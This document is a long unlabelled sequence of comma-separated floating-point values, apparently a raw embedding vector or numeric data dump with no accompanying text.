0.03473091125488281, 0.003676063846796751, 0.03250572457909584, -0.007216812577098608, -0.03349803760647774, 0.014350932091474533, -0.006194430403411388, 0.006333504803478718, -0.0060854265466332436, 0.012546729296445847, -0.023033659905195236, -0.007134119514375925, 0.00408200966194272, 0.02223680354654789, 0.021845892071723938, -0.0010815821588039398, -0.0065665473230183125, 0.029258159920573235, -0.005059286020696163, 0.02387562021613121, -0.00623577693477273, -0.000531864061485976, 0.013343585655093193, -0.015395866706967354, -0.02097386121749878, 0.0032701180316507816, -0.014726807363331318, -0.026627030223608017, 0.03954211622476578, 0.02324414998292923, 0.02879207395017147, -0.021259525790810585, -0.014065266586840153, 0.016162652522325516, 0.02936340495944023, -0.02028224989771843, -0.004382709972560406, -0.0164934229105711, -0.020673159509897232, 0.03017529658973217, -0.01398257352411747, -0.01228361576795578, -0.006532718893140554, 0.021906033158302307, 0.03244558721780777, -0.003072783350944519, 0.03433999791741371, -0.02004168927669525, -0.024807792156934738, 0.01587698794901371, -0.023589955642819405, 0.004578165244311094, 0.027363747358322144, 0.014365967363119125, 0.006893559359014034, 0.007047668099403381, 0.019485393539071083, 0.003050230909138918, 0.0008640441228635609, 0.009051085449755192, 0.004875107202678919, -0.0004757176211569458, -0.009374338202178478, 0.02216162718832493, -0.00623577693477273, -0.028626689687371254, 0.00035543739795684814, 0.031964465975761414, 0.016643773764371872, -0.021334702149033546, -0.0019188451115041971, -0.008434649556875229, -0.010780113749206066, 0.014847087673842907, 0.005972663871943951, 0.01700461469590664, -0.026611994951963425, 0.021364770829677582, -0.0018089015502482653, 0.025484368205070496, -0.03497146815061569, 0.01625286228954792, -0.0011210490483790636, 0.009930634871125221, -0.014245687052607536, 0.026566890999674797, 0.009133778512477875, -0.010178712196648121, -0.006957458332180977, 0.007825731299817562, -0.03521202877163887, -0.018793782219290733, -0.01593712717294693, 0.0008353836019523442, -0.0024131215177476406, -0.0038038615602999926, -0.026371434330940247, 0.02249239757657051, 0.0026198532432317734, -0.020357424393296242, -0.029949771240353584, 0.027754656970500946, 0.0066642751917243, 0.008968392387032509, -0.024281566962599754, -0.003852725261822343, -0.020116863772273064, 0.006683068815618753, -0.016899369657039642, -0.012358791194856167, 0.0013944986276328564, -0.0414666011929512, -0.00392038282006979, -0.004980352241545916, 0.00042497439426369965, -0.018057065084576607, -0.03295677527785301, -0.021936101838946342, -0.011892705224454403, -0.00799863412976265, 0.00033687855466268957, 0.014065266586840153, -0.016463352367281914, 0.009810354560613632, 0.08401572704315186, -0.007344610057771206, 0.00925405789166689, 0.0010252008214592934, 0.01662873849272728, 0.0048412783071398735, 0.005675722379237413, 0.002153767505660653, 0.01953049935400486, -0.012832394801080227, 0.02563471905887127, -0.0030652659479528666, 0.0000582313587074168, 0.00967503897845745, 0.00549530191347003, 0.007483683992177248, -0.02670220658183098, -0.015185375697910786, 0.021184351295232773, 0.018417906016111374, 0.012200923636555672, -0.003717410145327449, 0.006517683621495962, -0.0016557321650907397, 0.03464069962501526, 0.001293012173846364, -0.034610629081726074, -0.02047770470380783, -0.04435332491993904, -0.0010073466692119837, -0.004559371620416641, -0.017049718648195267, -0.007915941067039967, -0.0023435845505446196, 0.0030821801628917456, 0.0071604312397539616, 0.0074235438369214535, 0.03497146815061569, 0.0035294722765684128, -0.009126260876655579, 0.015328208915889263, -0.0323854461312294, -0.02740885131061077, -0.005157013889402151, 0.0038677603006362915, 0.01011105440557003, 0.03325747698545456, -0.012268581427633762, -0.013508970849215984, 0.013080472126603127, 0.006867248099297285, -0.014538870193064213, 0.015546216629445553, -0.010193747468292713, 0.009855459444224834, 0.030506066977977753, -0.012779772281646729, -0.008735350333154202, -0.005705792456865311, -0.007400991395115852, 0.0006779856630600989, 0.006262088194489479, -0.03629455342888832, -0.016613703221082687, -0.0008762601064518094, -0.029949771240353584, -0.021199386566877365, -0.0015128994127735496, -0.03157355263829231, 0.020928755402565002, 0.0037719120737165213, -0.006810866761952639, 0.00393917690962553, -0.008051256649196148, 0.01984623447060585, 0.0010120451916009188, -0.01907944679260254, 0.010253887623548508, -0.008306851610541344, 0.0031535965390503407, 0.0119979502633214, 0.03220502659678459, -0.001295831287279725, 0.02041756547987461, -0.010742525570094585, 0.010750043205916882, -0.01159200444817543, -0.014982403255999088, -0.005920041352510452, 0.0030577483121305704, 0.018177345395088196, -0.0022345806937664747, 0.002700666431337595, -0.004713480360805988, 0.010900394059717655, 0.01707978919148445, -0.005976422689855099, 0.012163335457444191, -0.017681190744042397, -0.01676405407488346, 0.011862635612487793, 0.010780113749206066, 0.029152914881706238, -0.008148984052240849, -0.002657440723851323, 0.02172561176121235, -0.018568256869912148, -0.0024206391535699368, 0.0039880406111478806, -0.0014527593739330769, -0.012915086932480335, 0.0012356911320239305, 0.012982744723558426, -0.018598327413201332, -0.01218588836491108, -0.015952162444591522, 0.0033810012973845005, -0.007577653042972088, 0.001963950227946043, -0.03761763498187065, -0.013817188329994678, -0.015666496008634567, 0.018237486481666565, -0.021875962615013123, 0.01430582720786333, 0.013388690538704395, 0.00008498313400195912, -0.02022210881114006, 0.0029243126045912504, 0.0030145226046442986, 0.012960191816091537, -0.0073070223443210125, 0.006540236063301563, 0.004066974390298128, 0.013975056819617748, -0.00799863412976265, 0.021845892071723938, 0.014193064533174038, -0.008968392387032509, -0.00910370796918869, -0.008351956494152546, 0.020552881062030792, 0.003942935727536678, -0.0029073981568217278, 0.0038677603006362915, -0.011080813594162464, -0.0027852384373545647, 0.015230481512844563, -0.02010182850062847, 0.014486247673630714, 0.03061131201684475, -0.04471416771411896, -0.0071566724218428135, 0.017350420355796814, -0.030400821939110756, 0.007953528314828873, 0.010141124948859215, 0.0006742269615642726, -0.02008679509162903, 0.004533060360699892, 0.009118743240833282, 0.0074799251742661, 0.025679824873805046, -0.028867250308394432, 0.003450538497418165, 0.02689766138792038, 0.00950965378433466, -0.030851872637867928, -0.007085255812853575, 0.0023980867117643356, 0.015095165930688381, 0.006224500481039286, -0.017305314540863037, 0.005739620886743069, 0.02677738107740879, 0.006386127322912216, 0.0006793952197767794, -0.00005852501271874644, 0.02632633037865162, -0.016643773764371872, -0.01452383492141962, 0.009757732041180134, -0.018929097801446915, -0.006577823776751757, -0.017921751365065575, 0.00030281482031568885, -0.014704255387187004, -0.000889415736310184, -0.040023237466812134, 0.020643090829253197, 0.004269947297871113, 0.03596378117799759, -0.025349052622914314, 0.009742696769535542, 0.015922091901302338, -0.018132241442799568, -0.009111225605010986, -0.0149598503485322, -0.00011793098383350298, -0.008073808625340462, -0.007983598858118057, 0.005273535382002592, 0.006153084337711334, 0.009419444017112255, 0.0017036563949659467, -0.02343960478901863, 0.0071905008517205715, 0.024326670914888382, -0.01739552430808544, 0.01682419329881668, -0.007588929031044245, 0.009186401031911373, 0.004021869506686926, -0.03406936675310135, 0.025273878127336502, 0.008404579013586044, -0.011261234059929848, -0.01972595416009426, 0.003912865649908781, -0.009998291730880737, 0.0060816677287220955, 0.01388484612107277, 0.008464719168841839, -0.004405262414366007, -0.030581241473555565, 0.023214079439640045, 0.026446610689163208, -0.024236461147665977, -0.005378780420869589, 0.010607210919260979, -0.02922808937728405, -0.025439264252781868, 0.002399965887889266, 0.014621562324464321, -0.0044428501278162, -0.015892021358013153, 0.012246028520166874, 0.005905006546527147, 0.000564283283893019, -0.0007465829839929938, 0.034550487995147705, 0.004807449411600828, -0.030130190774798393, -0.0400833785533905, -0.015892021358013153, -0.00029177346732467413, 0.002708184067159891, 0.015666496008634567, -0.017816506326198578, -0.006243294570595026, 0.0008170596556738019, -0.00027157014119438827, -0.008254229091107845, -0.024867933243513107, -0.010283957235515118, 0.026942765340209007, 0.00021742057288065553, -0.013606698252260685, 0.006773279048502445, -0.011419101618230343, 0.018989237025380135, -0.003144199727103114, -0.00776559067890048, 0.00938937347382307, -0.00853237695991993, 0.018297625705599785, -0.026160944253206253, 0.0061981892213225365, 0.0002619383449200541, -0.016027336940169334, 0.010810183361172676, -0.004502990283071995, 0.009013498201966286, -0.0066717928275465965, -0.003256962401792407, -0.009870494715869427, 0.01156193483620882, -0.02468751184642315, 0.001892533851787448, -0.0025371606461703777, 0.015373313799500465, 0.037647705525159836, -0.0020240903832018375, -0.04717991128563881, -0.025724928826093674, -0.029498720541596413, -0.020267214626073837, -0.0043563987128436565, -0.011095848865807056, -0.00014952803030610085, -0.002407483523711562, -0.023199044167995453, -0.018914062529802322, -0.01739552430808544, 0.020928755402565002, 0.026191014796495438, -0.009028532542288303, 0.02147001586854458, -0.0013475142186507583, 0.010622245259582996, 0.00935930386185646, 0.033227406442165375, 0.015486076474189758, -0.008179053664207458, -0.004164702259004116, 0.010501965880393982, 0.0000846307520987466, -0.001824876293540001, -0.014200582168996334, -0.01149427704513073, -0.0029656589031219482, -0.0005295148002915084, -0.00585614237934351, -0.010058431886136532, 0.004559371620416641, 0.005187083967030048, 0.0011398429051041603, -0.012080643326044083, -0.0031554759480059147, 0.0003112720150966197, 0.013779601082205772, -0.012411413714289665, -0.03668546304106712, -0.0037042545154690742, -0.005837348755449057, 0.013245857320725918, -0.0013728857738897204, -0.012464036233723164, -0.004954040981829166, -0.03440013900399208, 0.017621049657464027, 0.024356741458177567, 0.026927731931209564, -0.006543994881212711, -0.007314539980143309, -0.019831199198961258, -0.007983598858118057, -0.006795831490308046, -0.016087478026747704, 0.0001262707228306681, -0.024101145565509796, 0.0250784233212471, 0.00018347430159337819, 0.008464719168841839, 0.028897318989038467, -0.017966855317354202, -0.008231676183640957, 0.030912013724446297, 0.0004914574092254043, -0.02199624292552471, -0.01990637369453907, -0.009487100876867771, -0.0025465574581176043, 0.00841209664940834, 0.01939518377184868, 0.020131899043917656, 0.008524859324097633, 0.015410901047289371, 0.019665813073515892, -0.05403588339686394, -0.03433999791741371, -0.03256586566567421, -0.012381344102323055, -0.005626858212053776, -0.0016829832457005978, -0.024326670914888382, -0.019951479509472847, 0.0016801641322672367, 0.013268410228192806, 0.0016998975770547986, 0.0025973008014261723, 0.011907740496098995, 0.03746728599071503, -0.014095336198806763, -0.019304972141981125, 0.0033622076734900475, 0.01073500793427229, -0.04730018973350525, -0.010577140375971794, 0.019124552607536316, 0.014155476354062557, 0.005318640265613794, -0.01750076934695244, 0.01903434284031391, -0.022597644478082657, -0.0028359817806631327, -0.013591662980616093, -0.0030596277210861444, 0.013433795422315598, -0.018748676404356956, 0.0038282934110611677, 0.01474184263497591, 0.021214421838521957, 0.02205638214945793, -0.017275243997573853, 0.02116931602358818, 0.0072882287204265594, -0.0005017939838580787, -0.02916795015335083, 0.0133811729028821, 0.013651803135871887, -0.03821903467178345, -0.005517854355275631, 0.01533572655171156, -0.008833077736198902, 0.0002626430941745639, -0.011456689797341824, -0.02059798501431942, 0.03331761807203293, -0.02199624292552471, 0.011155989021062851, -0.003629079321399331, 0.004766103345900774, -0.017876645550131798, -0.0004637365636881441, 0.02028224989771843, -0.005912523716688156, 0.013268410228192806, 0.011689732782542706, 0.02098889648914337, 0.018177345395088196, 0.02205638214945793, -0.005882453639060259, -0.018372802063822746, 0.004702204372733831, -0.014253204688429832, -0.012140783481299877, -0.018688537180423737, -0.024657441303133965, -0.005453955382108688, -0.01351648848503828, 0.0028773280791938305, 0.00812643114477396, -0.006983769591897726, -0.0024356741923838854, -0.002399965887889266, -0.019816163927316666, 0.00013566762208938599, -0.019936444237828255, -0.012516658753156662, 0.014907227829098701, -0.005010422319173813, -0.003450538497418165, 0.015343244187533855, -0.006412438582628965, -0.008509824983775616, -0.015230481512844563, 0.004172219429165125, -0.02758927270770073, -0.008036221377551556, 0.009660003706812859, 0.013757048174738884, 0.016463352367281914, 0.021815821528434753, -0.011764907278120518, 0.01826755702495575, 0.023800445720553398, -0.004736033268272877, 0.012358791194856167, 0.010614728555083275, 0.017876645550131798, -0.01978609338402748, 0.015125235542654991, -0.0018671622965484858, 0.03319733589887619, 0.009088672697544098, 0.013336068019270897, -0.0012112592812627554, -0.006115496624261141, -0.008419614285230637, 0.016854263842105865, -0.005547924432903528, -0.000798265915364027, 0.013403725810348988, 0.020252179354429245, -0.018944133073091507, -0.015606356784701347, -0.01631300337612629, 0.008539894595742226, -0.0019376389682292938, -0.001548607600852847, 0.019921408966183662, -0.008908253163099289, 0.0002950623747892678, -0.013065437786281109, 0.00850230734795332, 0.0005036733346059918, -0.00044893648009747267, 0.010411755181849003, -0.004969075787812471, 0.008404579013586044, -0.021575262770056725, -0.004307535011321306, 0.010817700996994972, 0.013050402514636517, -0.0004900478525087237, 0.00860003475099802, 0.012734666466712952, 0.005980181507766247, -0.009832906536757946, 0.01363676879554987, 0.0013663079589605331, -0.009990775026381016, -0.007006322033703327, 0.006352298427373171, 0.0033358964137732983, -0.012524176388978958, 0.004751068074256182, 0.0034336240496486425, -0.006412438582628965, -0.0028303435537964106, -0.015711601823568344, -0.004890142008662224, 0.006840936839580536, -0.007374680135399103, -0.002005296526476741, 0.00573210371658206, 0.0010524517856538296, 0.006021528039127588, -0.008291816338896751, -0.00012075005361111835, 0.0006765761645510793, -0.006096703000366688, -0.009562276303768158, -0.008975910022854805, 0.0010430548572912812, 0.009021015837788582, 0.0016529131680727005, -0.011734837666153908, -0.02829591929912567, 0.01769622601568699, -0.008254229091107845, -0.011622074991464615, -0.015057578682899475, 0.009058603085577488, 0.009810354560613632, 0.032475654035806656, -0.022763028740882874, -0.004653340671211481, -0.009434478357434273, 0.0006455664406530559, -0.0012140782782807946, 0.0025371606461703777, 0.006194430403411388, -0.0031254058703780174, -0.003561421763151884, -0.0017139929113909602, -0.011253716424107552, -0.02954382635653019, 0.0006798650720156729, -0.01039671991020441, 0.013486417941749096, -0.01225354615598917, -0.0007851102272979915, 0.0022214250639081, -0.0052096364088356495, -0.02739381603896618, 0.013997608795762062, -0.00540133286267519, 0.009660003706812859, -0.006814625579863787, -0.035242099314928055, 0.005032974760979414, 0.010321545414626598, -0.004969075787812471, -0.011298822239041328, 0.0027307365089654922, -0.00037000258453190327, 0.0022966002579778433, -0.019485393539071083, 0.004728515632450581, -0.024161286652088165, -0.014215616509318352, 0.0074235438369214535, -0.004852554760873318, -0.006325987167656422, 0.01244148425757885, -0.0033659664914011955, 0.0009063301258720458, 0.0017384248785674572, 0.017185034230351448, 0.005901247728615999, -0.03737707436084747, -0.011381514370441437, -0.005378780420869589, -0.022973518818616867, 0.004747309256345034, -0.005322399083524942, -0.0043526398949325085, -0.014373484998941422, 0.009472066536545753, 0.02928823046386242, -0.006495131179690361, -0.0004385999054647982, 0.004390227608382702, -0.010096020065248013, -0.033046986907720566, -0.00002770614628389012, -0.007081496994942427, 0.021635401993989944, -0.019876303151249886, 0.020131899043917656, 0.0037305657751858234, -0.010073467157781124, -0.01802699640393257, -0.0010590296005830169, 0.014403554610908031, -0.030701521784067154, 0.007863318547606468, 0.002742012729868293, 0.009013498201966286, 0.012291133403778076, -0.00821664184331894, 0.018117206171154976, 0.002862293040379882, 0.007506236433982849, -0.010283957235515118, -0.013944986276328564, -0.03446028009057045, -0.03163369372487068, 0.019500428810715675, 0.003916624002158642, -0.007773108314722776, -0.004886383190751076, -0.006980010773986578, 0.002452588640153408, -0.007081496994942427, -0.005743379704654217, -0.0010890996782109141, -0.022146593779325485, 0.009118743240833282, -0.005138220265507698, 0.009652486070990562, 0.01514778845012188, -0.0028547754045575857, 0.0337686687707901, -0.009554758667945862, -0.003146079136058688, -0.017966855317354202, -0.005141978617757559, -0.004059456754475832, -0.03187425434589386, -0.018974201753735542, 0.0035670597571879625, -0.0028378611896187067, 0.012682043947279453, 0.022086452692747116, -0.012456518597900867, 0.00891576986759901, 0.007333333604037762, -0.0009782164124771953, 0.02683752030134201, -0.012456518597900867, 0.006337263155728579, 0.0051946016028523445, -0.013290963135659695, 0.0013982574455440044, -0.0194553229957819, -0.007728003431111574, 0.003924141637980938, 0.013223305344581604, 0.013892363756895065, -0.004672134295105934, -0.014591492712497711, 0.011471725068986416, 0.006149325519800186, -0.012862464413046837, 0.020958825945854187, 0.0050780801102519035, 0.02059798501431942, -0.002334187738597393, -0.0007606783183291554, -0.017485734075307846, 0.013809670694172382, 0.00960738118737936, -0.019816163927316666, -0.0058110374957323074, -0.003927900455892086, 0.001969588454812765, -0.007100291084498167, 0.008291816338896751, 0.018688537180423737, -0.004514266271144152, -0.009975739754736423, -0.008607552386820316, -0.021034000441432, 0.004405262414366007, 0.006517683621495962, -0.007073979824781418, -0.014907227829098701, -0.0003244276740588248, 0.014749360270798206, 0.004984111059457064, 0.003439262043684721, -0.007735520601272583, -0.04540577903389931, -0.03503160923719406, -0.0009970101527869701, -0.005367503967136145, 0.008908253163099289, 0.008419614285230637, 0.007818213663995266, 0.007051426917314529, 0.01383222360163927, -0.004480437841266394, 0.003260721219703555, -0.006765761412680149, 0.005536648444831371, -0.0032174955122172832, 0.002307876478880644, -0.0026705963537096977, 0.009960704483091831, -0.006694345269352198, 0.012839912436902523, -0.003666666802018881, 0.016598667949438095, -0.0021330942399799824, 0.0061869132332503796, 0.015350760892033577, -0.0007832308765500784, -0.01587698794901371, 0.023529814556241035, 0.013103025034070015, -0.0030633865389972925, 0.006604135036468506, -0.0014151717768982053, 0.011479241773486137, -0.015395866706967354, -0.015576286241412163, 0.017230140045285225, 0.004367675166577101, 0.018733642995357513, 0.006626687478274107, -0.008712797425687313, -0.00002397675416432321, -0.024025971069931984, -0.0022327012848109007, -0.0283410232514143, -0.025935418903827667, -0.0016059286426752806, 0.012885017320513725, -0.014726807363331318, 0.008893217891454697, -0.0159972682595253, -0.0018887751502916217, -0.005145737435668707, -0.0058335899375379086, 0.0005783786182291806, -0.014764395542442799, 0.011862635612487793, -0.012133265845477581, 0.011328891851007938, -0.017094824463129044, -0.007363403681665659, 0.017651120200753212, -0.013065437786281109, -0.014463694766163826, -0.010351615026593208, 0.008908253163099289, -0.015140270814299583, 0.0010486930841580033, 0.002557833679020405, -0.018914062529802322, 0.022131558507680893, -0.006096703000366688, 0.0005920041585341096, 0.010381685569882393, 0.005743379704654217, -0.02109414152801037, -0.020898684859275818, -0.020177004858851433, -0.0074273026548326015, 0.030190331861376762, 0.0023454639595001936, -0.00011963416909566149, 0.008893217891454697, 0.0011896464275196195, -0.020582949742674828, 0.011674697510898113, -0.022702889516949654, 0.01029899250715971, 0.009817872196435928, -0.006025286391377449, -0.009855459444224834, 0.03409943729639053, -0.01228361576795578, -0.006205706857144833, 0.020492739975452423, -0.004762344527989626, -0.005198359955102205, 0.011238682083785534, -0.021214421838521957, -0.012328720651566982, 0.0014151717768982053, -0.02205638214945793, 0.005337434355169535, -0.00259166257455945, 0.002779600443318486, -0.014636597596108913, -0.0015213566366583109, -0.00661541149020195, -0.03061131201684475, 0.01278728898614645, -0.0066680340096354485, -0.00017795362509787083, 0.019620709121227264, 0.0026931490283459425, -0.00535246916115284, -0.0024601060431450605, 0.0008522980497218668, -0.006765761412680149, 0.028235778212547302, -0.01674901880323887, 0.025288913398981094, 0.010050914250314236, -0.01087032351642847, -0.01137399673461914, 0.000048423353291582316, 0.02310883440077305, 0.0030671453569084406, 0.004112079739570618, 0.02147001586854458, 0.012058090418577194, -0.017621049657464027, 0.0012676406186074018, -0.015042543411254883, -0.013005297631025314, -0.030881943181157112, 0.020928755402565002, -0.012839912436902523, -0.012073125690221786, 0.005826072301715612, 0.004698445554822683, -0.004694686736911535, -0.024777721613645554, 0.007555100601166487, -0.005991457961499691, -0.009013498201966286, 0.0020879891235381365, 0.0010844012722373009, -0.011644626967608929, 0.01171228475868702, 0.013689391314983368, -0.0028980011120438576, -0.012306168675422668, 0.002240218920633197, 0.008291816338896751, -0.0016782847233116627, -0.01177994254976511, -0.0056982748210430145, 0.009208953008055687, 0.009690074250102043, 0.000509311503265053, 0.004363916348665953, 0.03987288847565651, -0.01783153973519802, -0.018658466637134552, -0.022522468119859695, -0.002270288998261094, -0.009381855838000774, 0.016553563997149467, -0.00019991885346826166, 0.007468649186193943, -0.0133811729028821, 0.0003876217524521053, -0.01650845818221569, -0.011862635612487793, -0.010652315802872181, -0.03485118970274925, 0.006773279048502445, -0.0008931744960136712, -0.010096020065248013, 0.004984111059457064, 0.008103879168629646, -0.005100632552057505, -0.02109414152801037, 0.0012432086514309049, -0.020703230053186417, -0.03806868568062782, 0.03343789651989937, 0.003448659088462591, 0.00030704340315423906, -0.0024281565565615892, -0.012163335457444191, 0.005130702629685402, 0.01883888803422451, 0.01120861154049635, 0.004581924062222242, 0.0077580735087394714, -0.010509482584893703, -0.0034542970824986696, 0.024898001924157143, 0.002422518562525511, 0.03758756443858147, 0.026115840300917625, 0.004687169101089239, -0.003439262043684721, 0.006295917090028524, -0.00790842343121767, 0.01442610751837492, -0.0005130702629685402, 0.011982915922999382, -0.012614386156201363, 0.02098889648914337, 0.013599180616438389, 0.032415516674518585, -0.0010139246005564928, 0.001502562896348536, -0.001295831287279725, 0.010441825725138187, -0.02160533145070076, 0.014614044688642025, 0.004232359584420919, 0.017154963687062263, 0.013418760150671005, 0.0132308229804039, -0.004814967047423124, -0.011817529797554016, -0.024416882544755936, 0.01996651478111744, -0.003345293225720525, 0.00628464063629508, -0.00415718462318182, -0.018688537180423737, 0.02387562021613121, -0.015606356784701347, 0.03334768861532211, 0.025935418903827667, -0.016959508880972862, -0.0017431232845410705, 0.007089014630764723, 0.003552024718374014, 0.012922604568302631, 0.009366821497678757, -0.026130875572562218, 0.00540133286267519, -0.004796173423528671, 0.00480369059368968, -0.0027908766642212868, 0.003119767876341939, -0.018673501908779144, -0.00692738825455308, -0.008870664983987808, -0.026221085339784622, -0.00920143537223339, -0.015967197716236115, -0.014162993989884853, -0.007664104457944632, -0.004006834235042334, 0.0022740475833415985, 0.014561422169208527, 0.024416882544755936, -0.02500324696302414, -0.00802870374172926, -0.010614728555083275, -0.01587698794901371, -0.0053261579014360905, 0.004209807142615318, 0.03106236271560192, -0.020492739975452423, -0.022026313468813896, 0.014027679339051247, 0.013140612281858921, 0.01676405407488346, -0.0003521484904922545, -0.014005126431584358, -0.02306372858583927, -0.012170853093266487, -0.004089526832103729, 0.011080813594162464, -0.0007583291153423488, 0.0075250305235385895, 0.0061869132332503796, -0.0025973008014261723, 0.004882624838501215, 0.015425936318933964, -0.006036562845110893, -0.011764907278120518, -0.007231847383081913, -0.007930976338684559, -0.02046266943216324, -0.003324619960039854, -0.03710644319653511, -0.00819408893585205, -0.0028303435537964106, -0.01587698794901371, -0.0012883137678727508, 0.0088857002556324, 0.018598327413201332, -0.0030859389808028936, -0.009547241032123566, -0.00828429963439703, 0.021575262770056725, -0.004130873363465071, 0.0024131215177476406, -0.0027645654045045376, 0.025364087894558907, -0.0059463526122272015, 0.01838783733546734, -0.008487272076308727, 0.008539894595742226, -0.014208098873496056, 0.006036562845110893, 0.008983427658677101, 0.004036904312670231, 0.013366137631237507, -0.009284128434956074, 0.02022210881114006, 0.00299948756583035, 0.002913036150857806, 0.02217666245996952, 0.017801471054553986, 0.004627028945833445, -0.008088843896985054, 0.0041195969097316265, 0.0058110374957323074, 0.003140440909191966, -0.007735520601272583, -0.009351786226034164, -0.02160533145070076, -0.002195113804191351, 0.010103537701070309, 0.015696566551923752, 0.00022023962810635567, -0.0002466683799866587, -0.013591662980616093, -0.013336068019270897, -0.002882966073229909, 0.006032804027199745, -0.018177345395088196, 0.0019038101891055703, 0.007491201627999544, 0.01706475391983986, 0.0035501455422490835, 0.014907227829098701, 0.003114129649475217, 0.0012056211708113551, 0.026191014796495438, -0.0041008032858371735, 0.021379806101322174, -0.014215616509318352, -0.009878012351691723, -0.012464036233723164, 0.014042713679373264, 0.01335861999541521, -0.00015164233627729118, -0.007389714941382408, 0.0008865966810844839, -0.010050914250314236, -0.0022778064012527466, -0.0020485222339630127, 0.011005639098584652, -0.02168050780892372, 0.0022439775057137012, 0.002490176120772958, 0.011509312316775322, 0.00033687855466268957, 0.011171024292707443, 0.006310951896011829, 0.014478730037808418, -0.01844797655940056, -0.03268614411354065, 0.0017525202129036188, -0.007588929031044245, -0.004439091309905052, 0.00051025120774284, -0.0025296430103480816, 0.005138220265507698, -0.013501453213393688, 0.030445927754044533, -0.017681190744042397, -0.009329233318567276, -0.025424228981137276, 0.007243123836815357, -0.004690927919000387, -0.026822485029697418, -0.01789168082177639, -0.012952675111591816, 0.008261746726930141, 0.0004923971137031913, -0.02879207395017147, -0.011719802394509315, 0.030190331861376762, -0.0002518366673029959, -0.005871177650988102, -0.0043413639068603516, 0.009757732041180134, -0.004412780050188303, 0.014110371470451355, 0.02734871208667755, -0.012456518597900867, 0.006205706857144833, 0.0009227747214026749, -0.025093458592891693, -0.015696566551923752, -0.014974885620176792, -0.01096053421497345, 0.014726807363331318, 0.008682727813720703, -0.024161286652088165, -0.010742525570094585, 0.013283445499837399, 0.0037775503005832434, 0.03677567467093468, 0.0062019480392336845, 0.011870153248310089, -0.015771742910146713, 0.004315052181482315, 0.010283957235515118, -0.002610456431284547, -0.014884675852954388, 0.01834273152053356, 0.00043906972859986126, 0.008419614285230637, -0.012794806621968746, -0.01744063012301922, -0.003480608342215419, -0.015050061047077179, -0.009945669211447239, -0.024326670914888382, -0.0032419273629784584, -0.010193747468292713, 0.02292841486632824, -0.019891338422894478, 0.008607552386820316, -0.014320862479507923, 0.007310781162232161, 0.0015655220486223698, 0.0067394501529634, -0.03888057544827461, -0.0024864173028618097, -0.013463865965604782, -0.03746728599071503, 0.026596959680318832, 0.013644285500049591, -0.011629592627286911, 0.006468819919973612, -0.000042403469706187025, 0.0004928669659420848, 0.0058298311196267605, -0.009178883396089077, -0.005916282534599304, 0.010539553128182888, -0.008539894595742226, -0.02235708385705948, 0.010156160220503807, -0.01802699640393257, -0.03232530504465103, -0.006728174164891243, -0.00304647209122777, -0.01625286228954792, 0.0071604312397539616, 0.0037794297095388174, 0.00834443885833025, 0.003448659088462591, 0.001294891582801938, -0.02008679509162903, -0.003347172634676099, 0.050367336720228195, -0.0004559841472655535, -0.003072783350944519, 0.006051597651094198, -0.006600376218557358, 0.007378438953310251, 0.00017290280084125698, 0.006465061102062464, 0.0005064924480393529, 0.014764395542442799, 0.0002905988658312708, -0.000014036606444278732, -0.0036854606587439775, -0.0010073466692119837, -0.01959063857793808, 0.01613258197903633, 0.019365113228559494, 0.003095336025580764, 0.012230993248522282, 0.007697933353483677, -0.011043226346373558, -0.0035087992437183857, 0.011013156734406948, 0.012268581427633762, 0.01369690801948309, -0.004630787763744593, 0.005585512146353722, -0.028265848755836487, -0.009276610799133778, -0.0017309073591604829, 0.005551683250814676, 0.002980693941935897, -0.008141466416418552, -0.021018965169787407, -0.005048010032624006, 0.006153084337711334, -0.013960021547973156, -0.017470700666308403, 0.0013982574455440044, 0.0031254058703780174, 0.02865675836801529, 0.014328379184007645, -0.01250162348151207, -0.006269605830311775, 0.024041006341576576, 0.0017374851740896702, -0.028130533173680305, 0.009720143862068653, -0.005611823406070471, -0.006156843155622482, -0.011005639098584652, -0.006100461818277836, -0.020958825945854187, -0.0017590980278328061, 0.020056724548339844, 0.010126089677214622, -0.01738048903644085, 0.019184693694114685, -0.0014508799649775028, -0.0014640355948358774, 0.02903263457119465, 0.009878012351691723, 0.0016576115740463138, -0.005322399083524942, 0.0063034347258508205, 0.007637793198227882, 0.008765419945120811, -0.012313686311244965, -0.020943790674209595, 0.0059989751316607, 0.007607723120599985, 0.033046986907720566, -0.014779429882764816, -0.005871177650988102, 0.010253887623548508, 0.027243467047810555, 0.0060816677287220955, 0.013321032747626305, 0.01959063857793808, -0.013238340616226196, 0.010133607313036919, -0.020883651450276375, 0.009502136148512363, -0.01084025390446186, -0.008870664983987808, -0.006408679764717817, -0.013298479840159416, 0.01574167236685753, 0.016718948259949684, 0.013321032747626305, 0.003399795154109597, 0.01682419329881668, -0.0036196825094521046, 0.01433589681982994, -0.007051426917314529, -0.0013005296932533383, -0.005104391369968653, 0.02292841486632824, -0.00415718462318182, 0.011013156734406948, -0.027980182319879532, 0.01694447360932827, 0.010434308089315891, -0.00378694711253047, 0.008539894595742226, -0.03292670473456383, 0.0004421237390488386, -0.012246028520166874, 0.007066462188959122, -0.02425149641931057, 0.004232359584420919, -0.00511566735804081, -0.01502750813961029, 0.018883991986513138, 0.013689391314983368, -0.016598667949438095, -0.0039880406111478806, 0.0008067230810411274, -0.003444900270551443, 0.012712114490568638, -0.02796514704823494, -0.0011689732782542706, 0.01611754670739174, 0.0035407484974712133, -0.022447293624281883, -0.025033317506313324, 0.013501453213393688, 0.0033622076734900475, -0.0036422349512577057, -0.025815138593316078, 0.005961387883871794, 0.0008814283646643162, 0.012719632126390934, 0.018417906016111374, 0.009720143862068653, 0.00784076564013958, -0.02563471905887127, 0.017425594851374626, -0.0006916112033650279, -0.013238340616226196, -0.003418589010834694, 0.015486076474189758, -0.007686656899750233, 0.004397745244204998, -0.0012789168395102024, -0.027423886582255363, 0.014350932091474533, 0.02393576130270958, -0.0035726979840546846, 0.00816401932388544, -0.014298309572041035, 0.0016594909830018878, 0.0011154109379276633, 0.013268410228192806, -0.0066717928275465965, -0.00733709242194891, -0.010456860065460205, 0.006359816063195467, -0.023409534245729446, 0.007081496994942427, 0.005747138522565365, -0.010983086191117764, -0.0019150864100083709, 0.0043714335188269615, 0.02255253866314888, -0.023710235953330994, -0.0030878183897584677, 0.03214488551020622, -0.02470254711806774, -0.007566376589238644, -0.001429267111234367, 0.0015561251202598214, 0.008855629712343216, 0.012103195302188396, 0.02140987664461136, 0.01726020872592926, 0.0036422349512577057, 0.005405091680586338, 0.007611481938511133, -0.024266531690955162, -0.011050743982195854, 0.017034683376550674, 0.005390056874603033, -0.006239535752683878, -0.010193747468292713, 0.008013668470084667, -0.00989304669201374, -0.0017863489920273423, -0.006446267478168011, 0.024852897971868515, 